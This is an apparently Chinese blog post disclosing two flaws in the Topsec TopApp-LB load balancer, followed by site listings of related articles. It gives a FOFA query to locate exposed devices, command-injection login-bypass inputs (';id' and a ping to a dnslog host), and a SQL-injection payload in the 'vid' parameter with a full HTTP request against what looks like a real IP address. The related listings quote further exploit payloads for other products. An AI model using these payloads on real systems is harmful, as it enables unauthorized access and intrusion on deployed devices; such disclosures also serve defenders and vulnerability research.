天融信TopApp-LB 负载均衡系统

最新推荐文章于 2023-06-28 06:00:00 发布
原创 最新推荐文章于 2023-06-28 06:00:00 发布 · 2.4k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文披露了天融信TopApp-LB系统的两个严重安全问题:任意用户登录漏洞,允许攻击者无需密码直接登录;以及SQL注入漏洞,通过特定参数实现。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

fofa:"TopApp-LB"

在这里插入图片描述

1.任意用户登录

①用户名随意 密码:;id(天融信负载均衡TopApp-LB系统无需密码直接登录)
②用户名: ; ping 9928e5.dnslog.info; echo 密码:随意
在这里插入图片描述
登录成功
在这里插入图片描述

2.sql注入漏洞

注入点vid

t=l&e=0&s=t&l=1&vid=1'--+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=@..

在这里插入图片描述
在这里插入图片描述

POST /acc/clsf/report/datasource.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 132
Origin: http://218.249.111.77:8888
Connection: close
Referer: http://218.249.111.77:8888/acc/clsf/report/datasource.php
Cookie: PHPSESSID=q5ra6lik94u92fprhbl4nplq26
Upgrade-Insecure-Requests: 1

t=l&e=0&s=t&l=1&vid=1&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=%40%26%2312290%3B

在这里插入图片描述

天融信负载均衡TopApp-LB命令执行
「应无所住而生其心」
06-27 405
时光静悄悄地流逝。世界上有些人因为忙而感到生活的沉重,而有些人因为闲而活得压抑。
【漏洞复现】某厂商TopApp-LB系统认证绕过漏洞
最新发布
晚风不及你
02-29 859
天融信负载均衡TopApp-LB系统是一款功能强大的负载均衡产品,能够帮助用户实现高效、稳定、安全的网络应用部署。
天融信TopApp NLB链路负载配置指导文档v2.doc
11-13
天融信 TopApp负载均衡系统的配置指导文档,从初始化开始详细指导了配置过程,建议大家下载使用。天融信负载均衡系统(以下简称TopApp产品)为客户提供高可靠的数据中心解决方案,包括链路负载均衡解决方案、服务器负载均衡解决方案、全局负载均衡解决方案。系统集成了压缩、缓存、SSL卸载等网络优化技术,加速业务系统提升系统效率。同时结合Web应用防火墙、DNS防火墙、DDoS攻击防护及漏洞扫描功能形成全方位的网络安全防护,为客户业务系统安全保驾护航。
天融信负载均衡配置手册
04-25
天融信负载均衡配置手册
2021Kfzz1#wiki#天融信负载均衡TopApp-LB任意登陆1
07-25
天融信负载均衡TopApp-LB任意登陆漏洞描述天融信负载均衡TopApp-LB系统无需密码可直接登陆,查看敏感信息影响版本天融信负载均衡TopApp-LB漏洞
天融信TOPApp-LB负载均衡-2020HW
战神/calmness的博客
09-25 2290
目录 描述 概述 影响 漏洞利用过程 前台绕过 注入 修复建议 天融信TOPApp-LB负载均衡SQL注入 描述 天融信负载均衡 TopAPP-LB产品旧版本在管理面存在SQL注入漏洞,具体为在可以访问管理服务情况 下,攻击者通过构造恶意请求,利用系统检查输入条件不严格的缺陷,进一步可获取部分系统本地信息。 概述 天融信负载均衡系统(以下简称TopApp产品)是一款融合了智能带宽控制功能的链路及服务器负载均衡产品。通过对网络出口链路和服务器资源的优化调度,TopApp-LB负载均
天融信负载均衡TopApp-LB任意登陆
「应无所住而生其心」
06-28 486
青年,青年!无论受怎样的挫折和打击,都要咬着牙关挺住,因为你们完全有机会重建生活;只要不灰心丧气,每一次挫折就只不过是通往新境界的一块普通绊脚石,而绝不会置人于死命。
天融信负载均衡 TopAPP-LB SQL 注入
m0_48520508的博客
09-23 923
网络安全检测与防护技术国家地方联合工程研究中心 1、负载均衡系统概述 天融信负载均衡系统(以下简称TopApp产品)是一款融合了智能带宽控制功能的链路及服务器负载均衡产品。通过对网络出口链路和服务器资源的优化调度,TopApp-LB负载均衡系统让大规模的应用部署轻松实现,同时达至最稳定的运行效果,最高的资源利用率,最佳的应用性能和用户体验。大量的企事业单位通过TopApp-LB负载均衡系统顺利实现了应用部署,满足了信息化发展的需求,并极大地提升了工作效率。 天融信负载均衡设备图: 应用场景图: 2、漏洞
网络负载均衡
#维多利亚的秘密#
08-05 2506
负载均衡是由多台服务器以对称的方式组成一个服务器集合,每台服务器都具有等价的地位,都可以单独对外提供服务而无须其他服务器的辅助。通过某种负载分担技术,将外部发送来的请求均匀分配到对称结构中的某一台服务器上,而接收到请求的服务器独立地回应客户的请求。均衡负载能够平均分配客户请求到服务器列阵,籍此提供快速获取重要数据,解决大量并发访问服务问题。 目录 1定义
web访问负载均衡的实现
weixin_34320724的博客
11-08 162
主要的目的是实现负载均衡,所以采用rpm包安装,DNS也是提供最基本的正向解析。 环境介绍:三台虚拟机,数据库服务器以及DNS服务器放在172.16.16.3台虚拟机上,在172.16.16.33这台虚拟机上创建论坛,172.16.16.1这台虚拟机用来挂载第二台虚拟机上的论坛。 环境图示: 注意:确认selinux的状态时关闭的。 在虚拟机172....
天融信初始账户密码 .xlsx
11-17
天融信产品存在各个设备初始账户密码均不同的情况,此表收集一些常用的账户密码仅供参考
天融信防火墙配置指南
12-07
天融信防火墙配置指南天融信防火墙配置指南
天融信TopApp-LB 负载均衡系统漏洞总结
qq_17754023的博客
08-11 994
1、天融信负载均衡TopApp-LB系统无需密码直接登陆。3、天融信TopApp-LB 负载均衡系统Sql注入漏洞。app=“天融信-TopApp-LB-负载均衡系统”2、天融信TopApp-LB负载均衡命令执行漏洞。title=“TopApp-LB 负载均衡系统”1、使用poc::用户名随意 密码:;...
天融信网闸web界面登录方式_一探究竟——天融信网闸TopRules7000
weixin_39815600的博客
11-27 5292
网闸即:安全隔离与信息交换系统,常用作企业内外网隔离与业务互访用途。相比给服务器加多块网卡跨多个网段来说,网闸提供了更加安全的方式。TR-71289-Q探究背景:某次,网闸配置新业务,重启设备查看是否生效,结果发现刚重启完设备后,软件还可以发现设备登录系统,一旦应用策略就会提示"Access violation at address 004DF29C in module 'GAP.exe'.错误"...
ensp 移动主机搜索不到AP信道_有颜值更有才华,乘风破浪的天融信面板AP接受硬核实测...
weixin_39552472的博客
10-27 563
前言近日,信息化观察网选择天融信面板AP——TAP-62200(H)进行评测,希望评测数据能够帮助企业用户解决无线组网问题,营造快捷高效的办公环境。外观介绍TAP-62200(H)面板 AP 实拍图(正面)TAP-62200(H)面板 AP的机身为白色,外观采用八角工业设计,体积小巧,简约时尚,堪称无线AP产品中的颜值派。设备正面配有指示灯,可以通过不同的颜色显示设备不同的工作状态。TAP-622...
天融信网闸web界面登录方式_大华录像机网络回放有哪几种方式
weixin_39641738的博客
11-24 4028
录像机网络回放我们分为三种方式,下面给大家依次介绍下。方法一 WEB访问方式WEB访问前先确保主机与电脑之间网络连通,可以利用ping ***.***.***.***(硬盘录像机IP)来检测。如果ping通了,会有ping地址的返回信息,如下图:1、打开网页浏览器,地址栏输入要登录的硬盘录像机的IP地址,在登陆界面输入设备用户与密码登陆。注意:通过在地址栏输入要登录的硬盘录像机的IP地址登入设备的...
天融信防火墙NGFW4000配置手册
热门推荐
ly4983的专栏
05-21 6万+
天融信防火墙型号是NGFW4000 1.设备登录 1、 Web登录: 防火墙在出厂时缺省已经配置有WEB界面管理权限,如果没有,可用“pf service add name webui area area_eth0 addressname any”命令添加。  WEB管理服务缺省是启动的,如果没有启动,也可用“system httpd start”命令打开, 天融
第29节 天融信Topgate防火墙基础配置案例
m0_64378913的博客
02-20 1万+
防火墙配置目录1 实验拓扑图及实验要求1.1 网络拓扑图1.2 实验1:验证防火墙的区域隔离及策略编写1.3 实验2:做源转换SNAT1.4 实验3:目标转换DNAT1.5 实验4:应用层过滤2 实验1演示过程—验证防火墙的区域隔离及策略编写2.1 搭建网络拓扑结构2.2 给防火墙创建区域并配置IP2.3 在防火墙上写策略2.4 实验验证3 实验2演示过程—做源转换SNAT4 实验3演示过程—做目标地址转换DNAT4.1 将win2003-DMZ部署为网页服务器4.2 将隔离区
近期你已经授权登录过_近期公开0day及漏洞汇总
weixin_39568597的博客
11-19 387
一、深信服EDR设备RCE:Payload:https://ip/tool/log/c.php?strip_slashes=system&host=id二、深信服EDR设备任意用户登录登录:Payload:https://ip/ui/login.php?user=admin通过更改user参数的值即可实现任意用户登录三、通达OA-v11.6 Getshell:复现该漏洞会删除auth.in...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值